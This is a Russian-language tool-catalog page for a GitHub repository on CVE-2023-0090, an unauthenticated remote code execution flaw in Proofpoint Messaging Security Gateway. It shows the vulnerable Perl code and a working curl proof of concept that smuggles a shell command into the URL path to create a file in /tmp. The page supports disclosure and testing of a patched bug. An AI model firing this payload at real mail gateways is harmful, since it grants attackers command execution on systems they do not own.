Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
proofpoint-CVE-2023-0090 — Proofpoint Email Gateway: Неаутентифицированный RCE | Kitploit
Инструменты/GitHubGitHub/ly1g3/proofpoint-cve-2023-0090
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubly1g3/proofpoint-cve-2023-0090

proofpoint-CVE-2023-0090

Proofpoint Email Gateway: Неаутентифицированный RCE

Репозиторий
152 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Описание

Исследователь безопасности: ly1g3, ly1g3[at]tuta.io

GPG отпечаток: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Обзор: Удаленное выполнение кода - RCE без аутентификации

CVE: CVE-2023-0090

Хронология:

  • Обнаружено - ly1g3
  • Сообщено - ly1g3
  • Исправлено - Proofpoint

Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73

Эксплойты для Proofpoint Messaging Security Gateway

Удаленное выполнение кода (RCE)

Имея доступ к WebServices API, можно получить RCE без аутентификации с правами администратора.

Технические детали

Webservices.pm не очищает и не проверяет пользовательский ввод. Для доступа к функции не требуется аутентификация, однако для возможности выполнения RCE в настройках должен быть включен доступ к API. $module берется непосредственно из пользовательских данных и выполняется.


my $module = (split(/\//,$uri))[1];
$module = SERVICE_MODULE_PREFIX() . "::\u$module";

...


eval("require $module");

POC

Создаст файл с именем abc в /tmp/. Код выполняется с правами пользователя pps.

curl -k -vv "https://192.168.80.80:10010/ws/abc%2bsystem(%60id%20>%20\\\$\{SHELL:0:1\}tmp\\\$\{SHELL:0:1\}abc%60)"
Скачать инструмент